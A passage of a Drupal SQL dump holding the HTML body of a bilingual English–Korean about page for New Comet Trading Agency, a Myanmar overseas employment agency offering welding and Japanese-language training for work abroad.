lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 87, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span 